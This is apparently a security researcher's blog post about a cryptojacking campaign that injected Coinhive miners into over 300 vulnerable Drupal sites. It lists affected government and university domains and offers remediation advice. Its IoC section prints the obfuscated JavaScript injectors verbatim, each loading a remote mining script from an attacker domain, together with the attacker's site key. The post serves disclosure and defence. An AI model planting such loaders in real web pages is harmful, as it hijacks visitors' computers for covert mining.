Large cryptojacking campaign targeting vulnerable Drupal websites

Yesterday, I was alerted to a cryptojacking campaign affecting the websites of the San Diego Zoo and the government of Chihuahua, Mexico. While these two sites have no relation to each other, they shared a common denominator — they both use an outdated and vulnerable version of the Drupal content management system. After I analysed the IoCs, I was able to locate over 300 additional websites in this cryptojacking campaign. Many of those discovered were government and university sites from all over the world.

Digging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all the infected sites pointed to the same domain using the same Coinhive site key.

Deobfuscated Coinhive malware
In each case, the malicious code was obfuscated and unreadable to humans.

Once the code was deobfuscated, the reference to “http://vuuwd.com/t.js” was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.

Domain used to inject Coinhive malware
The Coinhive implementation has a small throttle configured to prevent 100% CPU usage.

The site key used was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” I confirmed the key was still active by checking in Fiddler. This was a bit redundant as the high CPU usage was a clear indicator of the cryptocurrency mining (hashing) taking place. Regardless, it’s always good to check since Coinhive implemented a few changes to their platform and how they handle abuse after the Brian Krebs investigation.

After contacting the San Diego Zoo advising them to remove the malware, I took a closer look at the domain name vuuwd.com.

While the WHOIS information was clearly fake, the email address used was associated with other domain registrations. This information is likely valuable for further investigation, but I decided not to go down that rabbit hole. Instead, I focused on the domain name at-hand, vuuwd.com.

This historical DNS data from SecurityTrails was especially interesting. We can clearly see the domain name was used previously in Monero (XMR) mining operations via mineXMR.com. While it’s somewhat unusual they’d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made.

Now that IoCs were clearly established, I turned to PublicWWW to locate other affected sites. The initial query I used yielded over 100,000 sites with references to the JavaScript library “/misc/jquery.once.js?v=1.2” in their source code. This was pared down to around 80,000 sites once I extracted the explicit snippet using a regular expression via PublicWWW’s snipex function.

Once I had the potential list of affected sites, I began scanning them for IoCs containing the obfuscated Coinhive malware. This was done using tools developed for me by Dan Snider. Dan has frequently provided invaluable assistance to my research and I recommend reading more about his work here.

The big reveal

After the scan completed, the full scope of this cryptojacking campaign was established — 348 infected websites. Using the bulk scan feature of urlscan.io, it became clear these sites were all running outdated and vulnerable versions of the Drupal content management system.

The affected sites varied by hosting provider and country, and no specific one appeared to be targeted. The largest number of unique domains was found in the United States, hosted by Amazon.

Unique domains found by country
Unique domains found by hosting provider

Looking further into the sites found, I was able to locate domains tied to educational institutions and government entities all over the world.

Government sites affected

The National Labor Relations Board – US federal agency
www.nlrb.gov

Government of Chihuahua, Mexico
chihuahua.gob.mx

City of Marion, Ohio
www.marionohio.us

Arizona Board of Behavioral Health Examiners
azbbhe.us

Social Security Institute of the State of Mexico and Municipalities
issemym.gob.mx

Turkish Revenue Administration – Aydın Tax Office
aydinvdb.gov.tr

Procalidad – “The Project Improvement of Higher Education Quality” – Peru
procalidad.gob.pe

Matzikama Municipality
www.matzikamamun.co.za

UMBRIA Special Reconstruction Office
www.sismaumbria2016.it


University / school sites affected

University of Aleppo
alepuniv.edu.sy

College of Biblical Studies
cbshouston.edu

IOHANES – University of Balamand
iohanes.balamand.edu.lb

Ringling College of Art and Design
www.ringling.edu

Vidyalankar Institute of Technology
vit.edu.in

University of Batangas
ub.edu.ph

Asia Pacific Institute of Information Technology (APIIT)
www.apiit.edu.my

Management Development Institute of Singapore in Tashkent
mdis.uz

Islamic Azad University of the Semnan branch
www.semnaniau.ac.ir

Tan Dan Secondary School
thcstttandan.edu.vn


Other sites affected

The full list of domains affected by this cryptojacking campaign is available in this Google Sheet. The direct URL to the infected JavaScript library (jquery.once.js?v=1.2) for each site is included. In addition, the title tag (name/description) has been extracted and is listed in the sheet.

2018-05-07 update

Additional websites have been identified and have been added to the Google Sheet. Notable sites include those of Lenovo, UCLA, DLink (Brazil), and the Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency.

Malicious code found on Lenovo's portal page.

Websites of UCLA and DLink Brazil were also found injecting Coinhive.

Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency

For some odd reason, the operator of this cryptojacking campaign chose to use a self-signed SSL certificate instead of one from a trusted CA. This could have easily (and freely) been done using Let's Encrypt — but was not. Due to this, the cryptojacking malware fails to load in the browser via HTTPS.

In addition to the self-signed SSL cert misstep, some sites, such as that of the Office of Inspector General of the EEOC, reference the non-secure (HTTP) version of the script. This is yet another blunder that hinders the effectiveness of this cryptojacking campaign, as Coinhive does not load.

2018-05-16 update

This cryptojacking campaign continues as the malware host vuuwd.com has been restored with a new Coinhive site key.

The spreadsheet of affected sites has been updated with my latest scan results. Follow me on Twitter for the latest updates on this ongoing story.

IoCs

http://vuuwd.com/t.js

https://vuuwd.com/t.js (Self-signed SSL cert by "WIN-QNCIT36VCLJ")

162.222.213.236

var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();

KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6

Closing Remarks

We’ve seen plenty of examples of Drupalgeddon 2 being exploited in the past few weeks. This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a website operator using Drupal’s content management system, you need to update to the latest available version ASAP. The Drupal security team has prepared a FAQ which documents the risk level and mitigation steps. Note that installing the update won’t retroactively “unhack” your website and you may need to take further remediation steps.

To stop cryptojacking in your browser, I recommend the extension minerBlock to block cryptojacking malware.

If you use other methods of blocking malicious activity at the network level, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

If you’d like to learn more about my work and what others are saying about it, please see this page. As always, I’m most active on Twitter — follow me @bad_packets.

Also, be sure to check out my Mirai-like botnet data website!
